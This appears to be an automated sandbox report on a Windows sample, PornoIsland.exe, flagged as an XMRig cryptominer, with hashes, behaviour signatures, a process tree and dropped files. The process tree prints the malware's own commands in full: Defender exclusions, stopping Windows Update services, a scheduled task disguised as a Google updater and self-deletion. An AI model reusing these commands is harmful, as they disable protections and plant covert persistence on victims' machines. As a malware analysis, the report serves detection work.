Overview

overview

10

Static

static

3

PornoIsland.exe

windows7-x64

10

PornoIsland.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    130s
  • max time network
    135s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230831-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230831-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02-09-2023 17:38

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    PornoIsland.exe

  • Size

    9.8MB

  • MD5

    464d2b53055d68784c4daff138109464

  • SHA1

    e9a861ee47ea22b575e645838ad9965dfce4e463

  • SHA256

    a3b067bce2714ddff6f9af3e64a8138c9d3481b51f65c9e47f7ff72bd776e604

  • SHA512

    e778b2ded722174dd4396d4c9e44c3a873ba2fc4869056eb0cdeb72beaf62000ebd21651450a124473876f39bb08b0e9aca07cfe3623d0655f468480f7d49a91

  • SSDEEP

    196608:dGTBQHJTbJk3kJr3CG+Rnm/fMuOzA3k95gMwmqXmIQS:dCBQpTb60Jf+RnQf/+A3klw0IZ

Score
10/10
xmrigevasionminer

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner payload 12 IoCs
    miner
  • Stops running service(s) 3 TTPs
    evasion
  • Executes dropped EXE 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3196
      • C:\Users\Admin\AppData\Local\Temp\PornoIsland.exe
        "C:\Users\Admin\AppData\Local\Temp\PornoIsland.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Suspicious behavior: EnumeratesProcesses
        PID:1980
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1952
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4052
        • C:\Windows\System32\sc.exe
          sc stop UsoSvc
          3⤵
          • Launches sc.exe
          PID:4000
        • C:\Windows\System32\sc.exe
          sc stop WaaSMedicSvc
          3⤵
          • Launches sc.exe
          PID:3304
        • C:\Windows\System32\sc.exe
          sc stop wuauserv
          3⤵
          • Launches sc.exe
          PID:988
        • C:\Windows\System32\sc.exe
          sc stop bits
          3⤵
          • Launches sc.exe
          PID:1844
        • C:\Windows\System32\sc.exe
          sc stop dosvc
          3⤵
          • Launches sc.exe
          PID:3788
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#sqljzfy#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3784
      • C:\Windows\System32\schtasks.exe
        C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
        2⤵
          PID:4524
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\PornoIsland.exe"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2644
          • C:\Windows\System32\choice.exe
            choice /C Y /N /D Y /T 3
            3⤵
              PID:1084
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
            2⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:2584
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:4252
            • C:\Windows\System32\sc.exe
              sc stop UsoSvc
              3⤵
              • Launches sc.exe
              PID:32
            • C:\Windows\System32\sc.exe
              sc stop WaaSMedicSvc
              3⤵
              • Launches sc.exe
              PID:3980
            • C:\Windows\System32\sc.exe
              sc stop wuauserv
              3⤵
              • Launches sc.exe
              PID:3960
            • C:\Windows\System32\sc.exe
              sc stop bits
              3⤵
              • Launches sc.exe
              PID:3684
            • C:\Windows\System32\sc.exe
              sc stop dosvc
              3⤵
              • Launches sc.exe
              PID:1364
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#sqljzfy#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }
            2⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:996
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe
            2⤵
              PID:3016
            • C:\Windows\System32\conhost.exe
              C:\Windows\System32\conhost.exe
              2⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              PID:1728
          • C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
            C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
            1⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2504

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            2KB

            MD5

            d85ba6ff808d9e5444a4b369f5bc2730

            SHA1

            31aa9d96590fff6981b315e0b391b575e4c0804a

            SHA256

            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

            SHA512

            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            944B

            MD5

            77d622bb1a5b250869a3238b9bc1402b

            SHA1

            d47f4003c2554b9dfc4c16f22460b331886b191b

            SHA256

            f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

            SHA512

            d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            05e343b77f6414a6903f7224194f7673

            SHA1

            6cac56c039beba339c6a3c393b1ba0a76e3d3a44

            SHA256

            580447d54d45eb51f177bf20932e79f8492e447d1eba6365ced1d63b1d742d9b

            SHA512

            b65a1f89b625dd60e70a38cc5eab31ab52ef07a5cd71141616afb19859a3bb4c5fdadcd81a76892ce19dda92d1fd1b6b80c338322a6ae40e9f793ec769278566

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            944B

            MD5

            bd5940f08d0be56e65e5f2aaf47c538e

            SHA1

            d7e31b87866e5e383ab5499da64aba50f03e8443

            SHA256

            2d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6

            SHA512

            c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nwsp0znm.lsn.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            Download Submit

          • C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
            Filesize

            9.8MB

            MD5

            464d2b53055d68784c4daff138109464

            SHA1

            e9a861ee47ea22b575e645838ad9965dfce4e463

            SHA256

            a3b067bce2714ddff6f9af3e64a8138c9d3481b51f65c9e47f7ff72bd776e604

            SHA512

            e778b2ded722174dd4396d4c9e44c3a873ba2fc4869056eb0cdeb72beaf62000ebd21651450a124473876f39bb08b0e9aca07cfe3623d0655f468480f7d49a91

            Download Submit

          • C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
            Filesize

            9.8MB

            MD5

            464d2b53055d68784c4daff138109464

            SHA1

            e9a861ee47ea22b575e645838ad9965dfce4e463

            SHA256

            a3b067bce2714ddff6f9af3e64a8138c9d3481b51f65c9e47f7ff72bd776e604

            SHA512

            e778b2ded722174dd4396d4c9e44c3a873ba2fc4869056eb0cdeb72beaf62000ebd21651450a124473876f39bb08b0e9aca07cfe3623d0655f468480f7d49a91

            Download Submit

          • memory/996-55-0x00007FFAF7B40000-0x00007FFAF8601000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/996-70-0x00007FFAF7B40000-0x00007FFAF8601000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/996-68-0x0000023E7D510000-0x0000023E7D520000-memory.dmp

            Filesize

            64KB

            Download

          • memory/996-56-0x0000023E7D510000-0x0000023E7D520000-memory.dmp

            Filesize

            64KB

            Download

          • memory/996-57-0x0000023E7D510000-0x0000023E7D520000-memory.dmp

            Filesize

            64KB

            Download

          • memory/1728-93-0x00007FF79EE90000-0x00007FF79F67F000-memory.dmp

            Filesize

            7.9MB

            Download

          • memory/1728-79-0x00007FF79EE90000-0x00007FF79F67F000-memory.dmp

            Filesize

            7.9MB

            Download

          • memory/1728-91-0x00007FF79EE90000-0x00007FF79F67F000-memory.dmp

            Filesize

            7.9MB

            Download

          • memory/1728-89-0x00007FF79EE90000-0x00007FF79F67F000-memory.dmp

            Filesize

            7.9MB

            Download

          • memory/1728-76-0x000001E9FA7D0000-0x000001E9FA7F0000-memory.dmp

            Filesize

            128KB

            Download

          • memory/1728-85-0x000001E9FA890000-0x000001E9FA8B0000-memory.dmp

            Filesize

            128KB

            Download

          • memory/1728-84-0x00007FF79EE90000-0x00007FF79F67F000-memory.dmp

            Filesize

            7.9MB

            Download

          • memory/1728-82-0x000001E9FA890000-0x000001E9FA8B0000-memory.dmp

            Filesize

            128KB

            Download

          • memory/1728-87-0x00007FF79EE90000-0x00007FF79F67F000-memory.dmp

            Filesize

            7.9MB

            Download

          • memory/1728-81-0x00007FF79EE90000-0x00007FF79F67F000-memory.dmp

            Filesize

            7.9MB

            Download

          • memory/1728-101-0x00007FF79EE90000-0x00007FF79F67F000-memory.dmp

            Filesize

            7.9MB

            Download

          • memory/1728-77-0x000001E9FA810000-0x000001E9FA850000-memory.dmp

            Filesize

            256KB

            Download

          • memory/1728-95-0x00007FF79EE90000-0x00007FF79F67F000-memory.dmp

            Filesize

            7.9MB

            Download

          • memory/1728-97-0x00007FF79EE90000-0x00007FF79F67F000-memory.dmp

            Filesize

            7.9MB

            Download

          • memory/1728-99-0x00007FF79EE90000-0x00007FF79F67F000-memory.dmp

            Filesize

            7.9MB

            Download

          • memory/1952-10-0x00007FFAF7A90000-0x00007FFAF8551000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/1952-12-0x000001B735B90000-0x000001B735BA0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/1952-0-0x000001B737C80000-0x000001B737CA2000-memory.dmp

            Filesize

            136KB

            Download

          • memory/1952-11-0x000001B735B90000-0x000001B735BA0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/1952-13-0x000001B735B90000-0x000001B735BA0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/1952-16-0x00007FFAF7A90000-0x00007FFAF8551000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/1980-36-0x00007FF63C8C0000-0x00007FF63D29B000-memory.dmp

            Filesize

            9.9MB

            Download

          • memory/2504-75-0x00007FF6B5660000-0x00007FF6B603B000-memory.dmp

            Filesize

            9.9MB

            Download

          • memory/2584-54-0x00007FFAF7B40000-0x00007FFAF8601000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/2584-52-0x0000012047BE0000-0x0000012047BF0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/2584-51-0x0000012047BE0000-0x0000012047BF0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/2584-49-0x0000012047BE0000-0x0000012047BF0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/2584-48-0x0000012047BE0000-0x0000012047BF0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/2584-38-0x00007FFAF7B40000-0x00007FFAF8601000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/3016-80-0x00007FF7F4AD0000-0x00007FF7F4AFA000-memory.dmp

            Filesize

            168KB

            Download

          • memory/3016-78-0x00007FF7F4AD0000-0x00007FF7F4AFA000-memory.dmp

            Filesize

            168KB

            Download

          • memory/3784-34-0x00007FFAF7A90000-0x00007FFAF8551000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/3784-32-0x0000022822710000-0x0000022822720000-memory.dmp

            Filesize

            64KB

            Download

          • memory/3784-31-0x0000022822710000-0x0000022822720000-memory.dmp

            Filesize

            64KB

            Download

          • memory/3784-29-0x0000022822710000-0x0000022822720000-memory.dmp

            Filesize

            64KB

            Download

          • memory/3784-30-0x0000022822710000-0x0000022822720000-memory.dmp

            Filesize

            64KB

            Download

          • memory/3784-18-0x00007FFAF7A90000-0x00007FFAF8551000-memory.dmp

            Filesize

            10.8MB

            Download